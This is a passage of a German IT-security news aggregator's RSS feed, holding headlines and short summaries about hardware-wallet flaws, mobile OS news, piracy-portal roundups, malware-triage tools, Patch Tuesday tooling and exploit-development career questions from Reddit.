<link>https://tsecurity.de/de/3663379/it+sicherheit/malware+trojaner+viren/tangem+sicherheitsluecke+laser-angriff+hebelt+hardware-wallet+dauerhaft+aus/</link>
<pubDate>Sun, 12 Jul 2026 16:03:06 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Tangem Sicherheitslücke entdeckt: Ein Laser-Angriff kann Wallet-Passwörter umgehen. Keine Updates möglich, Risiko bei physischem Zugriff.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/it-sicherheit/tangem-sicherheitsluecke-laser-angriff-hardware-wallet-331348.html">Tangem Sicherheitslücke: Laser-Angriff hebelt Hardware-Wallet dauerhaft aus</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CalyxOS ist zurück, GrapheneOS bleibt trotzdem die bessere Wahl]]></title>
<description><![CDATA[CalyxOS ist zurück und setzt auf eine neue HSM-Signierung. GrapheneOS bleibt auf Pixel-Geräten dennoch die deutlich sicherere Lösung.
Der Artikel CalyxOS ist zurück, GrapheneOS bleibt trotzdem die bessere Wahl erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3662953/it+sicherheit/malware+trojaner+viren/calyxos+ist+zurueck+grapheneos+bleibt+trotzdem+die+bessere+wahl/</link>
<pubDate>Sun, 12 Jul 2026 10:02:45 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>CalyxOS ist zurück und setzt auf eine neue HSM-Signierung. GrapheneOS bleibt auf Pixel-Geräten dennoch die deutlich sicherere Lösung.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/softwareentwicklung/calyxos-ist-zurueck-grapheneos-bleibt-trotzdem-die-bessere-wahl-331341.html">CalyxOS ist zurück, GrapheneOS bleibt trotzdem die bessere Wahl</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows Warez – illegale Portale im Juli 2026]]></title>
<description><![CDATA[Welche Portale für Windows Warez sind noch aktiv? Wo ist noch was los und wo ist tote Hose? Unser jährliches Update frisch aus Juli 2026.
Der Artikel Windows Warez – illegale Portale im Juli 2026 erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3662889/it+sicherheit/malware+trojaner+viren/windows+warez+-+illegale+portale+im+juli+2026/</link>
<pubDate>Sun, 12 Jul 2026 08:47:45 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Welche Portale für Windows Warez sind noch aktiv? Wo ist noch was los und wo ist tote Hose? Unser jährliches Update frisch aus Juli 2026.</p>
<p>Der Artikel <a href="https://tarnkappe.info/listen/windows-warez-illegale-portale-im-juli-2026-331331.html">Windows Warez – illegale Portale im Juli 2026</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Patch Tuesday MCP]]></title>
<description><![CDATA[I built an open-source MCP server for Microsoft Patch Tuesday that lets AI assistants like Claude, Copilot, ChatGPT, and more answer patch questions directly from official MSRC data.  Every Patch Tuesday, security teams ask the same questions: what changed, what affects us, what is being exploite...]]></description>
<link>https://tsecurity.de/de/3662627/it+sicherheit/malware+trojaner+viren/patch+tuesday+mcp/</link>
<pubDate>Sun, 12 Jul 2026 04:18:05 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I built an open-source MCP server for Microsoft Patch Tuesday that lets AI assistants like Claude, Copilot, ChatGPT, and more answer patch questions directly from official MSRC data. </p> <p>Every Patch Tuesday, security teams ask the same questions: what changed, what affects us, what is being exploited, and what needs to be patched first? </p> <p>Ask things like:</p> <p> “Summarize this month’s Patch Tuesday”</p> <p> “Which of these CVEs are on the CISA KEV list?”</p> <p> “Show me CVEs with an exploitation probability above 50%”</p> <p> “What older patches does KB5094123 replace?”</p> <p> “What Critical CVEs hit Windows Server 2022 this month?” </p> <p>What makes it different: most vulnerability tools can look up a CVE, but they have no concept of a monthly Microsoft release, a KB article, or a product family. </p> <p>This server parses the full MSRC CVRF documents, so it can answer the questions Microsoft shops actually ask on the second Tuesday of every month. </p> <p>It is built around the data sources teams already trust:</p> <ul> <li>Official MSRC Security Update Guide API: Microsoft’s source for Security Update Guide and CVRF data</li> <li>EPSS scores from FIRST.org: daily-updated probability each CVE gets exploited in the next 30 days</li> <li>CISA KEV integration: confirmed-exploited CVEs with federal remediation due dates</li> <li>Supersedence chains: walks Microsoft’s “this KB replaces that KB” links so your assistant never recommends a stale patch</li> <li>Results ranked by real-world urgency: KEV/exploited → EPSS → severity → CVSS</li> </ul> <p>Zero API keys, zero accounts: everything comes from public MSRC, <a href="http://first.org/">FIRST.org</a>, and CISA feeds. Run it locally or remotely. Details below: </p> <p> Repo: <a href="https://github.com/jonnybottles/patch-tuesday-mcp">https://github.com/jonnybottles/patch-tuesday-mcp</a> </p> <p> Remote MCP server endpoint:<br> <a href="https://patch-tuesday-mcp.happyrock-b60185ec.eastus.azurecontainerapps.io/mcp">https://patch-tuesday-mcp.happyrock-b60185ec.eastus.azurecontainerapps.io/mcp</a> </p> <p>If you triage Microsoft updates frequently, I’d love feedback. If there’s a feature you’d use, open an issue. </p> <p>Disclaimer: This is an independent, self-built project and is not an official Microsoft tool or service. </p> <p><a href="https://www.facebook.com/hashtag/patchtuesday?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#PatchTuesday</a> <a href="https://www.facebook.com/hashtag/cybersecurity?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#CyberSecurity</a> <a href="https://www.facebook.com/hashtag/vulnerabilitymanagement?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#VulnerabilityManagement</a> <a href="https://www.facebook.com/hashtag/mcp?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#MCP</a> <a href="https://www.facebook.com/hashtag/ai?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#AI</a> <a href="https://www.facebook.com/hashtag/claude?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#Claude</a> <a href="https://www.facebook.com/hashtag/microsoft?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#Microsoft</a> <a href="https://www.facebook.com/hashtag/msrc?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#MSRC</a> <a href="https://www.facebook.com/hashtag/opensource?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#OpenSource</a> <a href="https://www.facebook.com/hashtag/infosec?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#InfoSec</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Active_Pick3975"> /u/Active_Pick3975 </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1ut3zp7/patch_tuesday_mcp/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1ut3zp7/patch_tuesday_mcp/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anyone able to verify if this steam game [Demo] is actual malware?]]></title>
<description><![CDATA[https://store.steampowered.com/app/4314010/Command_by_Voice_World_Conquest/ I downloaded this booted it and it said it was looking for steam wallet info as a hint prompt on the bottom and shortly after booted up a tcg_server.exe ofcourse i prompted on "No" and uninstalled shortly after then a dee...]]></description>
<link>https://tsecurity.de/de/3662626/it+sicherheit/malware+trojaner+viren/anyone+able+to+verify+if+this+steam+game+demo+is+actual+malware/</link>
<pubDate>Sun, 12 Jul 2026 04:18:03 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p><a href="https://store.steampowered.com/app/4314010/Command_by_Voice_World_Conquest/">https://store.steampowered.com/app/4314010/Command_by_Voice_World_Conquest/</a></p> <p>I downloaded this booted it and it said it was looking for steam wallet info as a hint prompt on the bottom and shortly after booted up a tcg_server.exe ofcourse i prompted on "No" and uninstalled shortly after then a deepseek on the community tab opened up on steam and was stuck?</p> <p>Anyone out there with experience if this is actual malware and if i should be concerned or worried?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Historical_Cook7223"> /u/Historical_Cook7223 </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uu05xq/anyone_able_to_verify_if_this_steam_game_demo_is/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uu05xq/anyone_able_to_verify_if_this_steam_game_demo_is/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Tool] Magic Extractor — identify and unpack unknown files, installers and embedded payloads on Windows]]></title>
<description><![CDATA[I wanted a Windows-friendly alternative to tools such as Binwalk and UniExtract, focused on identifying unknown files and automatically choosing the appropriate extraction method. That idea eventually became Magic Extractor, an open-source utility intended to help with static triage and the initi...]]></description>
<link>https://tsecurity.de/de/3662625/it+sicherheit/malware+trojaner+viren/tool+magic+extractor+-+identify+and+unpack+unknown+files+installers+and+embedded+payloads+on+windows/</link>
<pubDate>Sun, 12 Jul 2026 04:18:02 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I wanted a Windows-friendly alternative to tools such as Binwalk and UniExtract, focused on identifying unknown files and automatically choosing the appropriate extraction method.</p> <p>That idea eventually became <strong>Magic Extractor</strong>, an open-source utility intended to help with static triage and the initial unpacking of suspicious samples.</p> <p>It can be useful for:</p> <ul> <li>Identifying files whose extension is missing or misleading</li> <li>Unpacking installers, SFX archives and uncommon compression formats</li> <li>Extracting nested archives recursively</li> <li>Listing contents without extraction</li> <li>Carving archives and payloads embedded at arbitrary offsets</li> <li>Trying multiple handlers when detection is ambiguous</li> </ul> <p>Detection combines PureMagic, custom magic signatures, Detect It Easy, Binwalk and Magika. The detected type is then routed to the appropriate bundled extractor.</p> <p>Example:</p> <p><code>magic-extractor identify suspicious.bin</code></p> <p><code>magic-extractor extract suspicious.bin --recursive</code></p> <p><code>magic-extractor carve firmware.bin --list</code></p> <p>It currently supports more than 80 formats, including archives, installers, disk images, forensic images and embedded content.</p> <p>This is not a malware detector, sandbox or replacement for dynamic analysis. It is mainly intended as a supporting tool for file identification, unpacking and static analysis workflows.</p> <p>GitHub:</p> <p><a href="https://github.com/xchwarze/magic-extractor">https://github.com/xchwarze/magic-extractor</a></p> <p>Feedback from malware analysts and reverse engineers would be especially useful, particularly regarding formats, packers or installers that are currently difficult to extract.</p> <p>As always, suspicious files should only be handled inside an isolated analysis environment.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/xchwarze"> /u/xchwarze </a> <br> <span><a href="https://github.com/xchwarze/magic-extractor">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uu1rni/tool_magic_extractor_identify_and_unpack_unknown/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gezine entdeckt Userland-Exploit für Nintendo Switch 1 & 2]]></title>
<description><![CDATA[Der Programmierer Gezine entdeckte einen Userland-Exploit, der aber mangels Kernel-Exploit auf der Switch noch keinen Jailbreak ermöglicht.
Der Artikel Gezine entdeckt Userland-Exploit für Nintendo Switch 1 & 2 erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3661479/it+sicherheit/malware+trojaner+viren/gezine+entdeckt+userland-exploit+fuer+nintendo+switch+1+2/</link>
<pubDate>Sat, 11 Jul 2026 10:03:01 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Der Programmierer Gezine entdeckte einen Userland-Exploit, der aber mangels Kernel-Exploit auf der Switch noch keinen Jailbreak ermöglicht.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/jailbreaks/gezine-entdeckt-userland-exploit-fuer-nintendo-switch-1-2-331326.html">Gezine entdeckt Userland-Exploit für Nintendo Switch 1 &amp; 2</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SpotiFLAC Mobile setzt auf eigenes Repo und Erweiterungen]]></title>
<description><![CDATA[SpotiFLAC Mobile trennt Suche und Download. Es nutzt eigene Erweiterungen und bietet je nach Quelle FLAC, Opus oder MP3.
Der Artikel SpotiFLAC Mobile setzt auf eigenes Repo und Erweiterungen erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3661343/it+sicherheit/malware+trojaner+viren/spotiflac+mobile+setzt+auf+eigenes+repo+und+erweiterungen/</link>
<pubDate>Sat, 11 Jul 2026 08:02:28 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>SpotiFLAC Mobile trennt Suche und Download. Es nutzt eigene Erweiterungen und bietet je nach Quelle FLAC, Opus oder MP3.</p>
<p>Der Artikel <a href="https://tarnkappe.info/test/spotiflac-mobile-setzt-auf-eigenes-repo-und-erweiterungen-331300.html">SpotiFLAC Mobile setzt auf eigenes Repo und Erweiterungen</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[EU-Kamerapflicht für Neuwagen: Fahrer unter Dauerbeobachtung?]]></title>
<description><![CDATA[Fahrerüberwachung im Auto wird Pflicht: Die EU-Kamerapflicht für Neuwagen soll Leben retten, wirft aber neue Fragen zum Datenschutz auf.
Der Artikel EU-Kamerapflicht für Neuwagen: Fahrer unter Dauerbeobachtung? erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3660376/it+sicherheit/malware+trojaner+viren/eu-kamerapflicht+fuer+neuwagen+fahrer+unter+dauerbeobachtung/</link>
<pubDate>Fri, 10 Jul 2026 18:33:56 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Fahrerüberwachung im Auto wird Pflicht: Die EU-Kamerapflicht für Neuwagen soll Leben retten, wirft aber neue Fragen zum Datenschutz auf.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/it-sicherheit/datenschutz/eu-kamerapflicht-fuer-neuwagen-331283.html">EU-Kamerapflicht für Neuwagen: Fahrer unter Dauerbeobachtung?</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Illegale Musik-Downloads im Juli 2026]]></title>
<description><![CDATA[Wo bekommt man illegale Musik-Downloads im Juli 2026? Wer ist überhaupt noch da? Das Interesse an diesem Warez-Sektor ist ungebrochen groß.
Der Artikel Illegale Musik-Downloads im Juli 2026 erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3660061/it+sicherheit/malware+trojaner+viren/illegale+musik-downloads+im+juli+2026/</link>
<pubDate>Fri, 10 Jul 2026 16:48:43 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Wo bekommt man illegale Musik-Downloads im Juli 2026? Wer ist überhaupt noch da? Das Interesse an diesem Warez-Sektor ist ungebrochen groß.</p>
<p>Der Artikel <a href="https://tarnkappe.info/listen/illegale-musik-downloads-im-juli-2026-331269.html">Illegale Musik-Downloads im Juli 2026</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[macOS Cracks: Apple-Download-Portale im Juli 2026]]></title>
<description><![CDATA[macOS Cracks im Juli 2026. Welche Portale sind eigentlich noch online? Die Downloads muss man auf jeden Fall auf Schadsoftware untersuchen.
Der Artikel macOS Cracks: Apple-Download-Portale im Juli 2026 erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3658814/it+sicherheit/malware+trojaner+viren/macos+cracks+apple-download-portale+im+juli+2026/</link>
<pubDate>Fri, 10 Jul 2026 07:33:07 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>macOS Cracks im Juli 2026. Welche Portale sind eigentlich noch online? Die Downloads muss man auf jeden Fall auf Schadsoftware untersuchen.</p>
<p>Der Artikel <a href="https://tarnkappe.info/listen/macos-cracks-apple-download-portale-im-juli-2026-331242.html">macOS Cracks: Apple-Download-Portale im Juli 2026</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta überwacht die Stimmung, zeichnet Stimme auf, überwacht Medikamenteneinnahme]]></title>
<description><![CDATA[Meta überwacht mit einem angemeldeten Patent die Stimmung der Nutzer bei tragbaren Geräten und prüft, ob man die Medikamente eingenommen hat.
Der Artikel Meta überwacht die Stimmung, zeichnet Stimme auf, überwacht Medikamenteneinnahme erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3656315/it+sicherheit/malware+trojaner+viren/meta+ueberwacht+die+stimmung+zeichnet+stimme+auf+ueberwacht+medikamenteneinnahme/</link>
<pubDate>Thu, 09 Jul 2026 10:03:06 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Meta überwacht mit einem angemeldeten Patent die Stimmung der Nutzer bei tragbaren Geräten und prüft, ob man die Medikamente eingenommen hat.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/it-sicherheit/datenschutz/meta-ueberwacht-die-stimmung-zeichnet-stimme-auf-ueberwacht-medikamenteneinnahme-331237.html">Meta überwacht die Stimmung, zeichnet Stimme auf, überwacht Medikamenteneinnahme</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Adblock-Möglichkeiten für den Desktop, Android und iOS]]></title>
<description><![CDATA[Adblock-Möglichkeiten für Desktop, Android und iOS: uBlock Origin, AdGuard, Brave, YouTube, Twitch und Bypass Paywalls Clean.
Der Artikel Adblock-Möglichkeiten für den Desktop, Android und iOS erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3656118/it+sicherheit/malware+trojaner+viren/adblock-moeglichkeiten+fuer+den+desktop+android+und+ios/</link>
<pubDate>Thu, 09 Jul 2026 08:17:53 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Adblock-Möglichkeiten für Desktop, Android und iOS: uBlock Origin, AdGuard, Brave, YouTube, Twitch und Bypass Paywalls Clean.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/internet/adblock-moeglichkeiten-fuer-den-desktop-android-und-ios-331215.html">Adblock-Möglichkeiten für den Desktop, Android und iOS</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ESET Threat Report H1 2026]]></title>
<description><![CDATA[A view of the H1 2026 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts.]]></description>
<link>https://tsecurity.de/de/3655984/it+sicherheit/malware+trojaner+viren/eset+threat+report+h1+2026/</link>
<pubDate>Thu, 09 Jul 2026 07:02:47 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A view of the H1 2026 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts.]]></content:encoded>
</item>
<item>
<title><![CDATA[PhD student looking for guidance on binary exploitation research]]></title>
<description><![CDATA[Dear all, I am a PhD student with a solid background in Linux binary exploitation, including both user-mode and kernel mode. My research interest lies in binary exploitation, and I am trying hard to increase my knowledge in this area. My goal is to write peer-reviewed research papers on binary ex...]]></description>
<link>https://tsecurity.de/de/3655777/it+sicherheit/malware+trojaner+viren/phd+student+looking+for+guidance+on+binary+exploitation+research/</link>
<pubDate>Thu, 09 Jul 2026 04:03:31 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Dear all,</p> <p>I am a PhD student with a solid background in Linux binary exploitation, including both user-mode and kernel mode. My research interest lies in binary exploitation, and I am trying hard to increase my knowledge in this area.</p> <p>My goal is to write peer-reviewed research papers on binary exploitation. But right now, I am not sure about how to find interesting areas of research, how to find research gaps, and what methodology I can follow for research in binary exploitation.</p> <p>Any suggestions on how do experienced researchers come up with new research questions, perform literature review, and choose research directions on vulnerability research and binary exploitation will be much appreciated!</p> <p>Thanks!</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Hopeful-Ad6787"> /u/Hopeful-Ad6787 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1ulbfhk/phd_student_looking_for_guidance_on_binary/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1ulbfhk/phd_student_looking_for_guidance_on_binary/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Study CS or conputer engineering]]></title>
<description><![CDATA[Hello, i am wondering if i should study cs or computer engineering and which would be more helpful for me in the long run. Ive been studying on pwn college and i am at the blue belt module rn, soon i want to start doing sec research on the linux kernel and ik that i qould need to study on my own ...]]></description>
<link>https://tsecurity.de/de/3655776/it+sicherheit/malware+trojaner+viren/study+cs+or+conputer+engineering/</link>
<pubDate>Thu, 09 Jul 2026 04:03:30 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hello, i am wondering if i should study cs or computer engineering and which would be more helpful for me in the long run. Ive been studying on pwn college and i am at the blue belt module rn, soon i want to start doing sec research on the linux kernel and ik that i qould need to study on my own for the most part but i would also have to get into uni as well. For cs in the universities in my country i dont see operating systems in the programs and mainly see stuff about web dev, learning 5 diff languages and doing databases, and in the other side for computer engineering would be more of how to build a cpu and working with resistors and studying physics. I am not really sure which kne to choose.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/FellowCat69"> /u/FellowCat69 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1ule79b/study_cs_or_conputer_engineering/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1ule79b/study_cs_or_conputer_engineering/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Tool] Crimson Cloak, iOS/iSH Security Wrapper with RealTime Dashboard]]></title>
<description><![CDATA[submitted by    /u/Fillmoslim   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3655775/it+sicherheit/malware+trojaner+viren/tool+crimson+cloak+iosish+security+wrapper+with+realtime+dashboard/</link>
<pubDate>Thu, 09 Jul 2026 04:03:29 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/ExploitDev/comments/1ulxs0k/tool_crimson_cloak_iosish_security_wrapper_with/"> <img src="https://external-preview.redd.it/V3esYGBpX9ghUpS59ToWsDZUf5Q3mUGcXMfGdZaVSj4.png?width=640&amp;crop=smart&amp;auto=webp&amp;s=424aa5175ec47cce3789e679f95498bbbc26e30a" alt="[Tool] Crimson Cloak, iOS/iSH Security Wrapper with RealTime Dashboard" title="[Tool] Crimson Cloak, iOS/iSH Security Wrapper with RealTime Dashboard"> </a> </td><td>   submitted by   <a href="https://www.reddit.com/user/Fillmoslim"> /u/Fillmoslim </a> <br> <span><a href="https://github.com/synchancybersecurity/Crimson-Cloak-ISH-wrapper-iOS-">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1ulxs0k/tool_crimson_cloak_iosish_security_wrapper_with/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[Win x64 Shellcode: Why Blind PEB Traversal Fails on Modern Windows and How to Fix It]]></title>
<description><![CDATA[submitted by    /u/RubberDuck31337   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3655774/it+sicherheit/malware+trojaner+viren/win+x64+shellcode+why+blind+peb+traversal+fails+on+modern+windows+and+how+to+fix+it/</link>
<pubDate>Thu, 09 Jul 2026 04:03:27 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/RubberDuck31337"> /u/RubberDuck31337 </a> <br> <span><a href="https://proteqtum.com/posts/02-win-x64-shellcode-teb-peb_en/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1umfphj/win_x64_shellcode_why_blind_peb_traversal_fails/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why do functions .NET not return at expected addresses?]]></title>
<description><![CDATA[I'm not sure if anybody else has noticed this, but when I decompiling .NET binaries and look into a function in DNSPY and set a breakpoint on the return instruction and then step one instruction once the breakpoint is hit. Instead of returning me to where the function was called, it returns me to...]]></description>
<link>https://tsecurity.de/de/3655773/it+sicherheit/malware+trojaner+viren/why+do+functions+net+not+return+at+expected+addresses/</link>
